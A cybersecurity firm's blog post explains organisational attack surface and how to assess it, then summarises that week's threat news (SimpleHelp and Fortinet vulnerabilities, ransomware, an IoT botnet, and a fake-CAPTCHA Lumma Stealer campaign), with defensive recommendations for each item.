#NSBCS.059 - Under the (Attack) Surface

Cyber Threat Intelligence
Written By Shane Bell

Source: NSB Cyber

 

Under the (Attack) Surface

What is Attack Surface

“Attack surface” is a term used to describe all possible combinations of attack avenues that a Threat Actor can use to obtain an initial foothold on a target’s organisational systems or networks. We place a strong emphasis on “all” because it does not only include the exploitation of internet-facing servers and applications, but also includes techniques that rely on social engineering such as tricking a user to execute a malicious Microsoft Word document, or even plugging a malicious USB device straight into a work computer.

When assessing attack surface, it is helpful to have an understanding of your organisation’s assets (both hardware and software!) combined with cyber threat intelligence of attack techniques to help the identification of and prioritistation of mitigating attack paths that could pose a significant risk to your organisation. An example is the usage of JavaScript files as malware payloads by the GootLoader malware. The typical user would rarely have the need to execute JavaScript (”.js”) file, yet by default the execution is enabled on Windows. By blocking typical users from directly executing JavaScript files, the risk of GootLoader JavaScript payloads successful executing is reduced, even if the user attempts to keep double-clicking on the malicious payload!

Another method of identifying potentially unknown attack surface involves conducting active scanning and discovery of your assets, particularly those that are internet-facing. Running frequent scans will provide you with a point-in-time snapshot of your exposure, such as whether a web server or a file-transfer server is open to the internet, and allow you to validate whether the services should be open. It should be no surprise that a service that is open, but an organisation has no need for, should be closed.

For larger organisations, discovering the unknown unknowns, i.e. devices that belong to them but they are not aware off (Shadow IT) can also be of great concern. The methods of discovering such devices relies upon the ability to conduct analysis of open sources such as WHOIS registries, internet databases or search engines, to identify potentially exposed assets.

This doesn’t cover all the possible avenues of attack but at least provides you with some insight into how you should be thinking about your attack surface.

How do you assess your attack surface?

Here are some suggestions to starting your journey into mapping out your attack surface:

  • Conduct internal and external scanning;

  • Ensure you have an asset inventory and regularly review the status of the assets;

  • Review cyber threat intelligence sources such as MITRE ATT&CK or Threat Actor Reports targeting your industry; and

  • Review the Microsoft Attack Surface Rules and consider turning them on audit mode to review activity in your network.

For information on NSB Cyber’s Cyber Threat Intelligence capabilities or to book a meeting with our team, click here.

What we read this week

  • Actively Exploited SimpleHelp Vulnerabilities - Threat actors are exploiting multiple vulnerabilities (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728) in SimpleHelp's remote monitoring and management (RMM) software to breach corporate networks. By targeting outdated instances, they gain persistent remote access, push malware, and pivot across affected systems. Once inside, they create privileged accounts and use SimpleHelp’s auto-update scripts to escalate capabilities. The most significant flaw includes insufficient authentication checks, allowing unauthorised installation of malicious tools. SimpleHelp advises immediate updates to patched versions, log analysis, and strong segmentation of RMM infrastructure. If not required for day-to-day business operations, administrators should remove the software from their environment.

  • Fortinet Vulnerability Exploit Up for Sale - Threat actors have been reported selling on Russian dark web forums an active exploit for Fortinet devices. The exploit leverage CVE-202-5591, which affect FortiOS, versions 7.0.0 to 7.0.16, and could allow remote attackers to bypass authentication and gain-super admin access to affected instances. If successful, threat actors could retrieve sensitive information and proceed to executing arbitrary commands. Fortinet has acknowledge the vulnerability and released patches for the affected versions. Users are recommended to assess their exposure, update to unaffected versions, disable public access to the management interfaces, and monitor their network traffic for indicators of compromise (IOCs) associated with the active exploitation.

  • Hellcat & Morpheus - Researchers discovered that the newly minted Hellcat and Morpheus ransomware variants share almost identical code and capabilities, indicating the possibility of a shared codebase or a shared builder application being leveraged by affiliates tied to both groups. Both ransomware feature consistent code structures, encryption routines, and overlapping TTPs, including advanced evasion tactics, lateral movement, and stealthy data exfiltration. Deployment patterns suggest affiliates rely on proven malicious frameworks and customization to maximize profitability while obscuring attribution. Analysts warn that these rebrands may herald increased campaigns, complicated by affiliate-based distribution. Indicators of Compromise have been provided to enhance the detection of the malware.

  • Novel IoT Botnet linked to Large-Scale DDoS Attacks - Trend Micro researchers have identified a global IoT botnet launching large-scale DDoS attacks on Japanese organisations. Based on Mirai and Bashlite variants, the botnet compromises devices through vulnerabilities and weak credentials. Wireless routers and IP cameras from major brands are infected by downloading malware payloads, which connect to command-and-control servers for coordinated assaults. The campaign primarily targets North America and Europe, though Japan remains a critical victim. To mitigate risks, experts recommend utilising a content delivery network (CDN) provider, enforcing rate limiting, and conducting real-time IP monitoring and blocking to minimise potential disruption.

  • Lumma Stealer delivered through fake CAPTCHA Campaign - Reports are outlining a new malware campaign leveraging fake CAPTCHA verification checks to deliver the Lumma infostealer. The campaign has targeted multiple industries across various verticals, which include healthcare, banking, marketing and telecommunication. The campaign has been assess to have a global scope, with Argentina, Colombia, Philippines and US being the main ones targeted. The attack chain is initiated when users visit a compromised websites, which directs them to a bogus CAPTCHA instructing to o copy and paste a command into the Run prompt in Windows that uses the native mshta.exe binary to download and execute an HTA file from a remote server. The HTA file then executes a chained command decoding and loading the Lumma Payload. It is worth nothing that the attack avoids browser-based defences, as it is executed outside of the browser perimeter.

References
https://www.bleepingcomputer.com/news/security/hackers-exploiting-flaws-in-simplehelp-rmm-to-breach-networks/
https://cybersecuritynews.com/hackers-allegedly-selling-fortinet-exploit/
https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/
https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
https://thehackernews.com/2025/01/beware-fake-captcha-campaign-spreads.html
Shane Bell
Previous

#NSBCS.060 - Different Hats, Same Mission: Reflections on a Cybersecurity Journey
Next

#NSBCS.058 - From Office to Anywhere: Governance and Compliance in the Hybrid Work Age